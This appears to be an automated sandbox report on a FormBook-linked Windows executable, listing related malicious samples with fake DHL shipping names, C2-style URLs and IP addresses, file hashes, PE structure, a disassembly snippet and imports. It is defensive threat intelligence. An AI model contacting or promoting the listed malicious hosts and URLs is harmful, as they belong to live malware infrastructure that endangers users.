• Number of non-executed functions: 296
Cookbook Comments:
• Found application associated with file extension: .exe
• Override analysis time to 240000 for current running targets taking high CPU consumption
• Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
• Excluded IPs from analysis (whitelisted): 20.12.23.50, 13.107.246.45
• Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
• Execution Graph export aborted for target gaJjobDqjDYWsfRWPZSKY.exe, PID 3812 because it is empty
• Report creation exceeded maximum time and may have missing disassembly code information.
• Report size exceeded maximum capacity and may have missing disassembly code.
• Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
Time | Type | Description
08:59:49 | API Interceptor | 11011852x Sleep call for process: netbtugc.exe modified
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
91.195.240.94 | rDHL8350232025-2.exe | Get hash | malicious | FormBook | Browse | www.rssnewscast.com/fo8o/
91.195.240.94 | DHL 8350232025-1.exe | Get hash | malicious | FormBook | Browse | www.rssnewscast.com/fo8o/
91.195.240.94 | DHL 745-12302024.exe | Get hash | malicious | FormBook | Browse | www.rssnewscast.com/fo8o/
91.195.240.94 | DHL 806-232024.exe | Get hash | malicious | FormBook | Browse | www.rssnewscast.com/fo8o/
91.195.240.94 | DHL 0737-12182024.exe | Get hash | malicious | FormBook | Browse | www.rssnewscast.com/fo8o/
91.195.240.94 | DHL 073412182024.exe | Get hash | malicious | FormBook | Browse | www.rssnewscast.com/fo8o/
91.195.240.94 | 236236236.elf | Get hash | malicious | Unknown | Browse | suboyule.736t.com/
91.195.240.94 | DHL 40312052024.exe | Get hash | malicious | FormBook | Browse | www.rssnewscast.com/fo8o/
91.195.240.94 | DHL 30312052024.exe | Get hash | malicious | FormBook | Browse | www.rssnewscast.com/fo8o/
91.195.240.94 | CCE 30411252024.exe | Get hash | malicious | FormBook | Browse | www.rssnewscast.com/fo8o/
154.215.72.110 | wOoESPII08.exe | Get hash | malicious | FormBook | Browse | www.3xfootball.com/fo8o/?xVY=IhZyPQIGe6uK3zP3twZWsYVeSSeNS0ZlW2eS79Xk6ut4afzj0LiRBEeFtQixSzG192fRs1GD25A478p7nOOnj6KtR967KJkZjHO4n68kz2fsmRVZ8Q==&Nz=LPhpDRap3
154.215.72.110 | N2sgk6jMa2.exe | Get hash | malicious | FormBook | Browse | www.3xfootball.com/fo8o/?qD=FrMTb&aZ=IhZyPQIGe6uK3zPwzgZotr9BPg6ZX3xlW2eS79Xk6ut4afzj0LiRBEeFtQixSzG192fRs1GD25A478p7nOOn1bCAV966J7ZkoXS5ptBuz2edhBZoh3xN24c=
154.215.72.110 | Document 151-512024.exe | Get hash | malicious | FormBook | Browse | www.3xfootball.com/fo8o/?4h8=YPQX8Tch&FBEd=IhZyPQIGe6uK3zP3twZWsYVeSSeNS0ZlW2eS79Xk6ut4afzj0LiRBEeFtQixSzG192fRs1GD25A478p7nOOnzPSqftK5Z9AZjHO4n69vlG+dhBZ38Q==
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
www.3xfootball.com | rDHL8350232025-2.exe | Get hash | malicious | FormBook | Browse | 154.215.72.110
www.3xfootball.com | DHL 8350232025-1.exe | Get hash | malicious | FormBook | Browse | 154.215.72.110
www.3xfootball.com | DHL 745-12302024.exe | Get hash | malicious | FormBook | Browse | 154.215.72.110
www.3xfootball.com | DHL 806-232024.exe | Get hash | malicious | FormBook | Browse | 154.215.72.110
www.3xfootball.com | DHL 0737-12182024.exe | Get hash | malicious | FormBook | Browse | 154.215.72.110
www.3xfootball.com | DHL 073412182024.exe | Get hash | malicious | FormBook | Browse | 154.215.72.110
www.3xfootball.com | DHL 40312052024.exe | Get hash | malicious | FormBook | Browse | 154.215.72.110
www.3xfootball.com | DHL 30312052024.exe | Get hash | malicious | FormBook | Browse | 154.215.72.110
www.3xfootball.com | CCE 30411252024.exe | Get hash | malicious | FormBook | Browse | 154.215.72.110
www.3xfootball.com | Certificate 11-18720.exe | Get hash | malicious | FormBook | Browse | 154.215.72.110
www.goldenjade-travel.com | rDHL8350232025-2.exe | Get hash | malicious | FormBook | Browse | 116.50.37.244
www.goldenjade-travel.com | DHL 8350232025-1.exe | Get hash | malicious | FormBook | Browse | 116.50.37.244
www.goldenjade-travel.com | DHL 745-12302024.exe | Get hash | malicious | FormBook | Browse | 116.50.37.244
www.goldenjade-travel.com | DHL 806-232024.exe | Get hash | malicious | FormBook | Browse | 116.50.37.244
www.goldenjade-travel.com | DHL 0737-12182024.exe | Get hash | malicious | FormBook | Browse | 116.50.37.244
www.goldenjade-travel.com | DHL 073412182024.exe | Get hash | malicious | FormBook | Browse | 116.50.37.244
www.goldenjade-travel.com | DHL 40312052024.exe | Get hash | malicious | FormBook | Browse | 116.50.37.244
www.goldenjade-travel.com | DHL 30312052024.exe | Get hash | malicious | FormBook | Browse | 116.50.37.244
                                                                                    CCE 30411252024.exeGet hashmaliciousFormBookBrowse
                                                                                    • 116.50.37.244
                                                                                    Certificate 11-18720.exeGet hashmaliciousFormBookBrowse
                                                                                    • 116.50.37.244
                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                    POWERLINE-AS-APPOWERLINEDATACENTERHKrDHL8350232025-2.exeGet hashmaliciousFormBookBrowse
                                                                                    • 154.215.72.110
                                                                                    DHL 8350232025-1.exeGet hashmaliciousFormBookBrowse
                                                                                    • 154.215.72.110
                                                                                    i686.elfGet hashmaliciousMiraiBrowse
                                                                                    • 156.244.6.20
                                                                                    z0r0.spc.elfGet hashmaliciousMiraiBrowse
                                                                                    • 156.242.206.56
                                                                                    i686.elfGet hashmaliciousMiraiBrowse
                                                                                    • 156.244.6.20
                                                                                    3.elfGet hashmaliciousUnknownBrowse
                                                                                    • 154.89.139.24
                                                                                    PKHDJwnF0I.exeGet hashmaliciousGhostRatBrowse
                                                                                    • 156.251.17.243
                                                                                    8R2YjBA8nI.exeGet hashmaliciousGhostRatBrowse
                                                                                    • 156.251.17.243
                                                                                    Hilix.ppc.elfGet hashmaliciousMiraiBrowse
                                                                                    • 45.202.220.139
                                                                                    Hilix.sh4.elfGet hashmaliciousMiraiBrowse
                                                                                    • 45.202.220.141
                                                                                    REGISTER-ASITrDHL8350232025-2.exeGet hashmaliciousFormBookBrowse
                                                                                    • 195.110.124.133
                                                                                    DHL 8350232025-1.exeGet hashmaliciousFormBookBrowse
                                                                                    • 195.110.124.133
                                                                                    DHL 745-12302024.exeGet hashmaliciousFormBookBrowse
                                                                                    • 195.110.124.133
                                                                                    DHL 806-232024.exeGet hashmaliciousFormBookBrowse
                                                                                    • 195.110.124.133
                                                                                    DHL 0737-12182024.exeGet hashmaliciousFormBookBrowse
                                                                                    • 195.110.124.133
                                                                                    DHL 073412182024.exeGet hashmaliciousFormBookBrowse
                                                                                    • 195.110.124.133
                                                                                    DHL 40312052024.exeGet hashmaliciousFormBookBrowse
                                                                                    • 195.110.124.133
                                                                                    DHL 30312052024.exeGet hashmaliciousFormBookBrowse
                                                                                    • 195.110.124.133
                                                                                    SRT68.exeGet hashmaliciousFormBookBrowse
                                                                                    • 195.110.124.133
                                                                                    CCE 30411252024.exeGet hashmaliciousFormBookBrowse
                                                                                    • 195.110.124.133
                                                                                    DONGFONG-TWDongFongTechnologyCoLtdTWrDHL8350232025-2.exeGet hashmaliciousFormBookBrowse
                                                                                    • 116.50.37.244
                                                                                    DHL 8350232025-1.exeGet hashmaliciousFormBookBrowse
                                                                                    • 116.50.37.244
                                                                                    DHL 745-12302024.exeGet hashmaliciousFormBookBrowse
                                                                                    • 116.50.37.244
                                                                                    DHL 806-232024.exeGet hashmaliciousFormBookBrowse
                                                                                    • 116.50.37.244
                                                                                    DHL 0737-12182024.exeGet hashmaliciousFormBookBrowse
                                                                                    • 116.50.37.244
                                                                                    DHL 073412182024.exeGet hashmaliciousFormBookBrowse
                                                                                    • 116.50.37.244
                                                                                    x86_64.elfGet hashmaliciousMirai, MoobotBrowse
                                                                                    • 101.0.232.112
                                                                                    mpsl.elfGet hashmaliciousMirai, MoobotBrowse
                                                                                    • 119.15.228.125
                                                                                    DHL 40312052024.exeGet hashmaliciousFormBookBrowse
                                                                                    • 116.50.37.244
                                                                                    DHL 30312052024.exeGet hashmaliciousFormBookBrowse
                                                                                    • 116.50.37.244
                                                                                    SEDO-ASDErDHL8350232025-2.exeGet hashmaliciousFormBookBrowse
                                                                                    • 91.195.240.94
                                                                                    DHL 8350232025-1.exeGet hashmaliciousFormBookBrowse
                                                                                    • 91.195.240.94
                                                                                    DHL 745-12302024.exeGet hashmaliciousFormBookBrowse
                                                                                    • 91.195.240.94
                                                                                    DHL 806-232024.exeGet hashmaliciousFormBookBrowse
                                                                                    • 91.195.240.94
                                                                                    DHL 0737-12182024.exeGet hashmaliciousFormBookBrowse
                                                                                    • 91.195.240.94
                                                                                    DHL 073412182024.exeGet hashmaliciousFormBookBrowse
                                                                                    • 91.195.240.94
                                                                                    236236236.elfGet hashmaliciousUnknownBrowse
                                                                                    • 91.195.240.94
                                                                                    DHL 40312052024.exeGet hashmaliciousFormBookBrowse
                                                                                    • 91.195.240.94
                                                                                    DHL 30312052024.exeGet hashmaliciousFormBookBrowse
                                                                                    • 91.195.240.94
                                                                                    CCE 30411252024.exeGet hashmaliciousFormBookBrowse
                                                                                    • 91.195.240.94
                                                                                    No context
                                                                                    No context
                                                                                    Process:C:\Windows\SysWOW64\netbtugc.exe
                                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
                                                                                    Category:dropped
                                                                                    Size (bytes):196608
                                                                                    Entropy (8bit):1.121297215059106
                                                                                    Encrypted:false
                                                                                    SSDEEP:384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
                                                                                    MD5:D87270D0039ED3A5A72E7082EA71E305
                                                                                    SHA1:0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
                                                                                    SHA-256:F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
                                                                                    SHA-512:18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
                                                                                    Malicious:false
                                                                                    Reputation:high, very likely benign file
                                                                                    Process:C:\Users\user\Desktop\BP-50C26_20241220_082241.exe
                                                                                    File Type:data
                                                                                    Category:dropped
                                                                                    Size (bytes):270848
                                                                                    Entropy (8bit):7.9931940421490335
                                                                                    Encrypted:true
                                                                                    SSDEEP:6144:lvOzc/5xhKTbizuB+6dDig3BhLFO5Km8sfS7eyl:hJ/5XgbxB+VgIKmyl
                                                                                    MD5:49193C89ADA3D93707577884A786CE92
                                                                                    SHA1:7902DA4FA75AB35C916384BC264103BC67992D2E
                                                                                    SHA-256:87404431E93F55CAB4889EF0D51F31AE7AF567EFB5B2AE1C1237A76EC25C27B3
                                                                                    SHA-512:ED97DB685ADB75F00C398CF322016A8D4755DD968310CB7AC5753F39297A2F0330317A935B57B34237E1373EEF44247C84ABF6E7AF16C8B8933E48274F446FFC
                                                                                    Malicious:false
                                                                                    Reputation:low
                                                                                    File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                    Entropy (8bit):7.391043450519018
                                                                                    TrID:
                                                                                    • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                    • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                    • DOS Executable Generic (2002/1) 0.02%
                                                                                    • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                    File name:BP-50C26_20241220_082241.exe
                                                                                    File size:1'565'696 bytes
                                                                                    MD5:33d01c02e1bb141330aa8be95c21f1bf
                                                                                    SHA1:2dd0a42aa9c37455d21a1e0baa50c1055a606c89
                                                                                    SHA256:4f23853d15d1c7ddb80df75d6fa9d59a1b998c17f8585e785da245dfd2022be2
                                                                                    SHA512:10f4e18fcb1ffc109962f51fd19910cefd131065bc7c13adb0adb831793f46c151191b846597902a1433514d4316b8d4fd7a160bfbee176f22f32f442ff35012
                                                                                    SSDEEP:24576:sqDEvCTbMWu7rQYlBQcBiT6rprG8auKcpnz4E3ESB3oyEQwOCfHmVXw+YWWgokJ:sTvC/MTQYxsWR7auKcpnEWvB3RE9Glo
                                                                                    TLSH:F675E00273D1C062FF9B92334B5AF65147BC69260523E62F13A81DBABE701B1563E763
                                                                                    File Content Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$.......................j:......j:..C...j:......@.*...............................n.......~.............{.......{.......{.........z....
                                                                                    Icon Hash:aaf3e3e3938382a0
                                                                                    Entrypoint:0x420577
                                                                                    Entrypoint Section:.text
                                                                                    Digitally signed:false
                                                                                    Imagebase:0x400000
                                                                                    Subsystem:windows gui
                                                                                    Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                                                                                    DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                                                                                    Time Stamp:0x677E636B [Wed Jan 8 11:37:15 2025 UTC]
                                                                                    TLS Callbacks:
                                                                                    CLR (.Net) Version:
                                                                                    OS Version Major:5
                                                                                    OS Version Minor:1
                                                                                    File Version Major:5
                                                                                    File Version Minor:1
                                                                                    Subsystem Version Major:5
                                                                                    Subsystem Version Minor:1
                                                                                    Import Hash:948cc502fe9226992dce9417f952fce3
                                                                                    Instruction
                                                                                    call 00007FCB68E22F43h
                                                                                    jmp 00007FCB68E2284Fh
                                                                                    push ebp
                                                                                    mov ebp, esp
                                                                                    push esi
                                                                                    push dword ptr [ebp+08h]
                                                                                    mov esi, ecx
                                                                                    call 00007FCB68E22A2Dh
                                                                                    mov dword ptr [esi], 0049FDF0h
                                                                                    mov eax, esi
                                                                                    pop esi
                                                                                    pop ebp
                                                                                    retn 0004h
                                                                                    and dword ptr [ecx+04h], 00000000h
                                                                                    mov eax, ecx
                                                                                    and dword ptr [ecx+08h], 00000000h
                                                                                    mov dword ptr [ecx+04h], 0049FDF8h
                                                                                    mov dword ptr [ecx], 0049FDF0h
                                                                                    ret
                                                                                    push ebp
                                                                                    mov ebp, esp
                                                                                    push esi
                                                                                    push dword ptr [ebp+08h]
                                                                                    mov esi, ecx
                                                                                    call 00007FCB68E229FAh
                                                                                    mov dword ptr [esi], 0049FE0Ch
                                                                                    mov eax, esi
                                                                                    pop esi
                                                                                    pop ebp
                                                                                    retn 0004h
                                                                                    and dword ptr [ecx+04h], 00000000h
                                                                                    mov eax, ecx
                                                                                    and dword ptr [ecx+08h], 00000000h
                                                                                    mov dword ptr [ecx+04h], 0049FE14h
                                                                                    mov dword ptr [ecx], 0049FE0Ch
                                                                                    ret
                                                                                    push ebp
                                                                                    mov ebp, esp
                                                                                    push esi
                                                                                    mov esi, ecx
                                                                                    lea eax, dword ptr [esi+04h]
                                                                                    mov dword ptr [esi], 0049FDD0h
                                                                                    and dword ptr [eax], 00000000h
                                                                                    and dword ptr [eax+04h], 00000000h
                                                                                    push eax
                                                                                    mov eax, dword ptr [ebp+08h]
                                                                                    add eax, 04h
                                                                                    push eax
                                                                                    call 00007FCB68E255EDh
                                                                                    pop ecx
                                                                                    pop ecx
                                                                                    mov eax, esi
                                                                                    pop esi
                                                                                    pop ebp
                                                                                    retn 0004h
                                                                                    lea eax, dword ptr [ecx+04h]
                                                                                    mov dword ptr [ecx], 0049FDD0h
                                                                                    push eax
                                                                                    call 00007FCB68E25638h
                                                                                    pop ecx
                                                                                    ret
                                                                                    push ebp
                                                                                    mov ebp, esp
                                                                                    push esi
                                                                                    mov esi, ecx
                                                                                    lea eax, dword ptr [esi+04h]
                                                                                    mov dword ptr [esi], 0049FDD0h
                                                                                    push eax
                                                                                    call 00007FCB68E25621h
                                                                                    test byte ptr [ebp+08h], 00000001h
                                                                                    pop ecx
                                                                                    Programming Language:
                                                                                    • [ C ] VS2008 SP1 build 30729
                                                                                    • [IMP] VS2008 SP1 build 30729
| Name | Virtual Address | Virtual Size | Is in Section |
|---|---|---|---|
| IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_IMPORT | 0xc8e64 | 0x17c | .rdata |
| IMAGE_DIRECTORY_ENTRY_RESOURCE | 0xd4000 | 0xa7974 | .rsrc |
| IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x17c000 | 0x7594 | .reloc |
| IMAGE_DIRECTORY_ENTRY_DEBUG | 0xb0ff0 | 0x1c | .rdata |
| IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_TLS | 0xc3400 | 0x18 | .rdata |
| IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0xb1010 | 0x40 | .rdata |
| IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_IAT | 0x9c000 | 0x894 | .rdata |
| IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 | |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x1000 | 0x9ab1d | 0x9ac00 | 0a1473f3064dcbc32ef93c5c8a90f3a6 | False | 0.565500681542811 | data | 6.668273581389308 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata | 0x9c000 | 0x2fb82 | 0x2fc00 | c9cf2468b60bf4f80f136ed54b3989fb | False | 0.35289185209424084 | data | 5.691811547483722 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data | 0xcc000 | 0x706c | 0x4800 | 53b9025d545d65e23295e30afdbd16d9 | False | 0.04356553819444445 | DOS executable (block device driver @\273\) | 0.5846666986982398 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc | 0xd4000 | 0xa7974 | 0xa7a00 | d41e26382fd075670a4c90001f15c713 | False | 0.9609185659023117 | data | 7.95852775839398 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc | 0x17c000 | 0x7594 | 0x7600 | c68ee8931a32d45eb82dc450ee40efc3 | False | 0.7628111758474576 | data | 6.7972128181359786 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_ICON | 0xd45a8 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 192 | English | Great Britain | 0.7466216216216216
RT_ICON | 0xd46d0 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 128, 16 important colors | English | Great Britain | 0.3277027027027027
RT_ICON | 0xd47f8 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 192 | English | Great Britain | 0.3885135135135135
RT_ICON | 0xd4920 | 0x2e8 | Device independent bitmap graphic, 32 x 64 x 4, image size 0 | English | Great Britain | 0.3333333333333333
RT_ICON | 0xd4c08 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 0 | English | Great Britain | 0.5
RT_ICON | 0xd4d30 | 0xea8 | Device independent bitmap graphic, 48 x 96 x 8, image size 0 | English | Great Britain | 0.2835820895522388
RT_ICON | 0xd5bd8 | 0x8a8 | Device independent bitmap graphic, 32 x 64 x 8, image size 0 | English | Great Britain | 0.37906137184115524
RT_ICON | 0xd6480 | 0x568 | Device independent bitmap graphic, 16 x 32 x 8, image size 0 | English | Great Britain | 0.23699421965317918
RT_ICON | 0xd69e8 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 0 | English | Great Britain | 0.13858921161825727
RT_ICON | 0xd8f90 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 0 | English | Great Britain | 0.25070356472795496
RT_ICON | 0xda038 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 0 | English | Great Britain | 0.3173758865248227
RT_MENU | 0xda4a0 | 0x50 | data | English | Great Britain | 0.9
RT_STRING | 0xda4f0 | 0x594 | data | English | Great Britain | 0.3333333333333333
RT_STRING | 0xdaa84 | 0x68a | data | English | Great Britain | 0.2735961768219833
RT_STRING | 0xdb110 | 0x490 | data | English | Great Britain | 0.3715753424657534
RT_STRING | 0xdb5a0 | 0x5fc | data | English | Great Britain | 0.3087467362924282
RT_STRING | 0xdbb9c | 0x65c | data | English | Great Britain | 0.34336609336609336
RT_STRING | 0xdc1f8 | 0x466 | data | English | Great Britain | 0.3605683836589698
RT_STRING | 0xdc660 | 0x158 | Matlab v4 mat-file (little endian) n, numeric, rows 0, columns 0 | English | Great Britain | 0.502906976744186
RT_RCDATA | 0xdc7b8 | 0x9ec3a | data | | | 1.0003167778464643
RT_GROUP_ICON | 0x17b3f4 | 0x76 | data | English | Great Britain | 0.6610169491525424
RT_GROUP_ICON | 0x17b46c | 0x14 | data | English | Great Britain | 1.25
RT_GROUP_ICON | 0x17b480 | 0x14 | data | English | Great Britain | 1.15
RT_GROUP_ICON | 0x17b494 | 0x14 | data | English | Great Britain | 1.25
RT_VERSION | 0x17b4a8 | 0xdc | data | English | Great Britain | 0.6181818181818182
RT_MANIFEST | 0x17b584 | 0x3ef | ASCII text, with CRLF line terminators | English | Great Britain | 0.5074478649453823
DLL | Import
WSOCK32.dll | gethostbyname, recv, send, socket, inet_ntoa, setsockopt, ntohs, WSACleanup, WSAStartup, sendto, htons, __WSAFDIsSet, select, accept, listen, bind, inet_addr, ioctlsocket, recvfrom, WSAGetLastError, closesocket, gethostname, connect
VERSION.dll | GetFileVersionInfoW, VerQueryValueW, GetFileVersionInfoSizeW
WINMM.dll | timeGetTime, waveOutSetVolume, mciSendStringW
COMCTL32.dll | ImageList_ReplaceIcon, ImageList_Destroy, ImageList_Remove, ImageList_SetDragCursorImage, ImageList_BeginDrag, ImageList_DragEnter, ImageList_DragLeave, ImageList_EndDrag, ImageList_DragMove, InitCommonControlsEx, ImageList_Create
MPR.dll | WNetGetConnectionW, WNetCancelConnection2W, WNetUseConnectionW, WNetAddConnection2W
WININET.dll | HttpOpenRequestW, InternetCloseHandle, InternetOpenW, InternetSetOptionW, InternetCrackUrlW, HttpQueryInfoW, InternetQueryOptionW, InternetConnectW, HttpSendRequestW, FtpOpenFileW, FtpGetFileSize, InternetOpenUrlW, InternetReadFile, InternetQueryDataAvailable
PSAPI.DLL | GetProcessMemoryInfo
IPHLPAPI.DLL | IcmpSendEcho, IcmpCloseHandle, IcmpCreateFile
USERENV.dll | DestroyEnvironmentBlock, LoadUserProfileW, CreateEnvironmentBlock, UnloadUserProfile
UxTheme.dll | IsThemeActive
KERNEL32.dll | DuplicateHandle, CreateThread, WaitForSingleObject, HeapAlloc, GetProcessHeap, HeapFree, Sleep, GetCurrentThreadId, MultiByteToWideChar, MulDiv, GetVersionExW, IsWow64Process, GetSystemInfo, FreeLibrary, LoadLibraryA, GetProcAddress, SetErrorMode, GetModuleFileNameW, WideCharToMultiByte, lstrcpyW, lstrlenW, GetModuleHandleW, QueryPerformanceCounter, VirtualFreeEx, OpenProcess, VirtualAllocEx, WriteProcessMemory, ReadProcessMemory, CreateFileW, SetFilePointerEx, SetEndOfFile, ReadFile, WriteFile, FlushFileBuffers, TerminateProcess, CreateToolhelp32Snapshot, Process32FirstW, Process32NextW, SetFileTime, GetFileAttributesW, FindFirstFileW, FindClose, GetLongPathNameW, GetShortPathNameW, DeleteFileW, IsDebuggerPresent, CopyFileExW, MoveFileW, CreateDirectoryW, RemoveDirectoryW, SetSystemPowerState, QueryPerformanceFrequency, LoadResource, LockResource, SizeofResource, OutputDebugStringW, GetTempPathW, GetTempFileNameW, DeviceIoControl, LoadLibraryW, GetLocalTime, CompareStringW, GetCurrentThread, EnterCriticalSection, LeaveCriticalSection, GetStdHandle, CreatePipe, InterlockedExchange, TerminateThread, LoadLibraryExW, FindResourceExW, CopyFileW, VirtualFree, FormatMessageW, GetExitCodeProcess, GetPrivateProfileStringW, WritePrivateProfileStringW, GetPrivateProfileSectionW, WritePrivateProfileSectionW, GetPrivateProfileSectionNamesW, FileTimeToLocalFileTime, FileTimeToSystemTime, SystemTimeToFileTime, LocalFileTimeToFileTime, GetDriveTypeW, GetDiskFreeSpaceExW, GetDiskFreeSpaceW, GetVolumeInformationW, SetVolumeLabelW, CreateHardLinkW, SetFileAttributesW, CreateEventW, SetEvent, GetEnvironmentVariableW, SetEnvironmentVariableW, GlobalLock, GlobalUnlock, GlobalAlloc, GetFileSize, GlobalFree, GlobalMemoryStatusEx, Beep, GetSystemDirectoryW, HeapReAlloc, HeapSize, GetComputerNameW, GetWindowsDirectoryW, GetCurrentProcessId, GetProcessIoCounters, CreateProcessW, GetProcessId, SetPriorityClass, VirtualAlloc, GetCurrentDirectoryW, lstrcmpiW, DecodePointer, GetLastError, RaiseException, InitializeCriticalSectionAndSpinCount, DeleteCriticalSection, InterlockedDecrement, InterlockedIncrement, ResetEvent, WaitForSingleObjectEx, IsProcessorFeaturePresent, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetCurrentProcess, CloseHandle, GetFullPathNameW, GetStartupInfoW, GetSystemTimeAsFileTime, InitializeSListHead, RtlUnwind, SetLastError, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, EncodePointer, ExitProcess, GetModuleHandleExW, ExitThread, ResumeThread, FreeLibraryAndExitThread, GetACP, GetDateFormatW, GetTimeFormatW, LCMapStringW, GetStringTypeW, GetFileType, SetStdHandle, GetConsoleCP, GetConsoleMode, ReadConsoleW, GetTimeZoneInformation, FindFirstFileExW, IsValidCodePage, GetOEMCP, GetCPInfo, GetCommandLineA, GetCommandLineW, GetEnvironmentStringsW, FreeEnvironmentStringsW, SetEnvironmentVariableA, SetCurrentDirectoryW, FindNextFileW, WriteConsoleW
USER32.dll | GetKeyboardLayoutNameW, IsCharAlphaW, IsCharAlphaNumericW, IsCharLowerW, IsCharUpperW, GetMenuStringW, GetSubMenu, GetCaretPos, IsZoomed, GetMonitorInfoW, SetWindowLongW, SetLayeredWindowAttributes, FlashWindow, GetClassLongW, TranslateAcceleratorW, IsDialogMessageW, GetSysColor, InflateRect, DrawFocusRect, DrawTextW, FrameRect, DrawFrameControl, FillRect, PtInRect, DestroyAcceleratorTable, CreateAcceleratorTableW, SetCursor, GetWindowDC, GetSystemMetrics, GetActiveWindow, CharNextW, wsprintfW, RedrawWindow, DrawMenuBar, DestroyMenu, SetMenu, GetWindowTextLengthW, CreateMenu, IsDlgButtonChecked, DefDlgProcW, CallWindowProcW, ReleaseCapture, SetCapture, PeekMessageW, GetInputState, UnregisterHotKey, CharLowerBuffW, MonitorFromPoint, MonitorFromRect, LoadImageW, mouse_event, ExitWindowsEx, SetActiveWindow, FindWindowExW, EnumThreadWindows, SetMenuDefaultItem, InsertMenuItemW, IsMenu, ClientToScreen, GetCursorPos, DeleteMenu, CheckMenuRadioItem, GetMenuItemID, GetMenuItemCount, SetMenuItemInfoW, GetMenuItemInfoW, SetForegroundWindow, IsIconic, FindWindowW, SystemParametersInfoW, LockWindowUpdate, SendInput, GetAsyncKeyState, SetKeyboardState, GetKeyboardState, GetKeyState, VkKeyScanW, LoadStringW, DialogBoxParamW, MessageBeep, EndDialog, SendDlgItemMessageW, GetDlgItem, SetWindowTextW, CopyRect, ReleaseDC, GetDC, EndPaint, BeginPaint, GetClientRect, GetMenu, DestroyWindow, EnumWindows, GetDesktopWindow, IsWindow, IsWindowEnabled, IsWindowVisible, EnableWindow, InvalidateRect, GetWindowLongW, GetWindowThreadProcessId, AttachThreadInput, GetFocus, GetWindowTextW, SendMessageTimeoutW, EnumChildWindows, CharUpperBuffW, GetClassNameW, GetParent, GetDlgCtrlID, SendMessageW, MapVirtualKeyW, PostMessageW, GetWindowRect, SetUserObjectSecurity, CloseDesktop, CloseWindowStation, OpenDesktopW, RegisterHotKey, GetCursorInfo, SetWindowPos, CopyImage, AdjustWindowRectEx, SetRect, SetClipboardData, EmptyClipboard, CountClipboardFormats, CloseClipboard, GetClipboardData, IsClipboardFormatAvailable, OpenClipboard, BlockInput, TrackPopupMenuEx, GetMessageW, SetProcessWindowStation, GetProcessWindowStation, OpenWindowStationW, GetUserObjectSecurity, MessageBoxW, DefWindowProcW, MoveWindow, SetFocus, PostQuitMessage, KillTimer, CreatePopupMenu, RegisterWindowMessageW, SetTimer, ShowWindow, CreateWindowExW, RegisterClassExW, LoadIconW, LoadCursorW, GetSysColorBrush, GetForegroundWindow, MessageBoxA, DestroyIcon, DispatchMessageW, keybd_event, TranslateMessage, ScreenToClient
